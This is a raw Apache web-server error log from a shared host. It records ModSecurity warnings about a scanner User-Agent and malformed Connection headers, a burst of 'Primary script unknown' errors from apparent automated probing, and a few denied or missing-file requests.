[Tue May 12 07:52:55.807751 2026] [security2:error] [pid 1842385:tid 1842402] [client 180.153.236.188:56147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Found User-Agent associated with security scanner"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agLANxs7kySIUZ3ORnJXtAAAAQw"], referer: https://www.missmandarine.com/
[Tue May 12 07:53:09.807370 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:09.921298 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:10.114716 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:10.209109 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:10.301628 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:10.394042 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:10.489246 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:10.710707 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:10.803380 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:10.897580 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:10.990145 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:11.082809 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:11.175192 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:11.269757 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:11.362237 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:11.454479 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:11.547555 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:11.639806 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:11.731824 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:11.849790 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:11.943121 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:12.055136 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:12.165296 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:12.342232 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:12.434619 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:12.724315 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:12.816621 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:12.908666 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:13.017363 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:13.186488 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:13.372648 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:13.571288 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:13.663194 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:13.755193 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:13.847946 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:13.944944 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:14.070187 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:14.167626 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:14.365560 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:14.681674 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:14.775509 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:14.884017 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:15.013009 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:15.105623 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:15.202723 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:16.020877 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:16.122556 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:16.307068 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:16.400433 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:16.720698 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:17.287404 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:17.824835 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:17.928350 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:18.021081 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:18.114185 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:18.398622 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:19.774964 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:19.965303 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:20.084898 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:20.274404 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:21.214520 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:21.850883 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:22.108586 2026] [proxy_fcgi:error] [pid 1916576:tid 1916601] [client 20.151.0.198:52544] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:22.696356 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:22.984245 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:23.083872 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:23.180077 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:23.276503 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:23.398792 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:23.495199 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:23.646172 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:23.748691 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:23.867504 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:23.964392 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:24.340109 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:24.439755 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:24.535956 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:24.635034 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:24.731248 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:24.856983 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:24.989899 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:25.086013 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:25.187653 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:25.289909 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:25.402505 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:25.498785 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:26.026449 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:26.122514 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:26.220750 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:26.351754 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:26.451940 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:26.570166 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:26.670666 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:26.766960 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:26.863917 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:27.357930 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:27.460719 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:27.561939 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:27.912196 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:28.008031 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:28.118269 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:28.220076 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:28.500428 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:28.597695 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:28.695883 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:28.796283 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:28.892392 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:28.989116 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:29.126702 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:29.222132 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:29.324065 2026] [proxy_fcgi:error] [pid 1842385:tid 1842401] [client 20.151.0.198:3037] AH01071: Got error 'Primary script unknown'
[Tue May 12 07:53:37.721728 2026] [authz_core:error] [pid 1842385:tid 1842414] [client 47.128.58.248:27988] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/IXR/error_log
[Tue May 12 07:54:14.341912 2026] [security2:error] [pid 1916576:tid 1916593] [client 170.106.35.137:51438] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agLAhsz9SA3M95KBdjnVPAAAAA8"]
[Tue May 12 07:54:16.310784 2026] [security2:error] [pid 1916576:tid 1916583] [client 170.106.35.137:37544] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agLAiMz9SA3M95KBdjnVQgAAAAU"], referer: http://www.castiglionecf.com
[Tue May 12 07:54:20.054392 2026] [security2:error] [pid 1916576:tid 1916602] [client 170.106.35.137:43202] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agLAjMz9SA3M95KBdjnVQwAAABg"], referer: https://www.castiglionecf.com/
[Tue May 12 07:55:55.377931 2026] [security2:error] [pid 1922055:tid 1922060] [client 170.106.165.186:48962] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agLA62nv04BZw2-6THKdVAAAAMM"]
[Tue May 12 07:55:58.250875 2026] [security2:error] [pid 1842385:tid 1842390] [client 170.106.165.186:33758] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agLA7hs7kySIUZ3ORnJYhQAAAQA"], referer: http://www.castiglionecorporatefinance.fr
[Tue May 12 07:56:09.319490 2026] [:error] [pid 1844863:tid 1844890] [client 193.24.211.103:4503] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 07:56:37.355082 2026] [security2:error] [pid 1921844:tid 1921853] [client 43.166.238.12:36646] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2021/12/Dune-etincelle-site-extrait-4.mp3"] [unique_id "agLBFSVy0GfyZVqx9_XxcQAAAIY"]